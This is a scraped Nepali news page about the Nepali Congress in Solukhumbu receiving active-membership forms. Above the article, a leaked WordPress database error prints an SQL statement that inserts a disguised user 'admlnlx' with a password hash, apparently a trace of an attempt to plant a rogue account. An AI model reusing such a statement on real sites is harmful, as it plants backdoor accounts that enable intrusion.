WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp02lir6QTBm0Hy0qKAOf5bw9IUwB21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:37:32', '', 'admlnlx', 'admlnlx')
नेपाली काङ्ग्रेस सोलुखुम्बुले लामो समयपछि क्रियाशिल सदस्यताको फारम प्राप्त गरेको छ । एक हजार ७ सय ३० नविकरण र १ हजार ७ सय ३० नयाँ सदस्यताको फारम प्राप्त गरेको नेपाली काङ्ग्रेस सोलुखुम्बुका प्रचारपसार विभाग प्रमुख नविन थापाले जानकारी दिएका छन।
नेपाली काङ्ग्रेसका सभापति शेरबहादुर देउवा र सोलुखुम्बुका सभापति बिनोद बस्नेत सहितको समूहको आज बिहान सम्पन्न छलफलपछि सभापतिले फारम बुझेको बताइएको छ ।जिल्लामा रहेको विधि र प्रक्रियामा सबैलाई सहभागी गराई क्रियाशिल वितरण गर्नुपर्ने सभापति देउवाको निर्देशन छ ।नेपाली काङ्ग्रेसको केन्द्रीय समितिको निर्णय अनुसार माघ मसान्त भित्र प्रत्येक जिल्लाले क्रियाशिल पठाउनुपर्ने भएपनि सोलुखुम्बु, सप्तरी, बारा र सिन्धुपालचोक सहित पाँच जिल्लाले फारमनै बुझन् सकेका थिएनन् । सोलुखुम्बुमले आज फारम बुझेसंगै अझ बढी विवादीत चार जिल्लाले बुझ्न बाँकी रहेको छ ।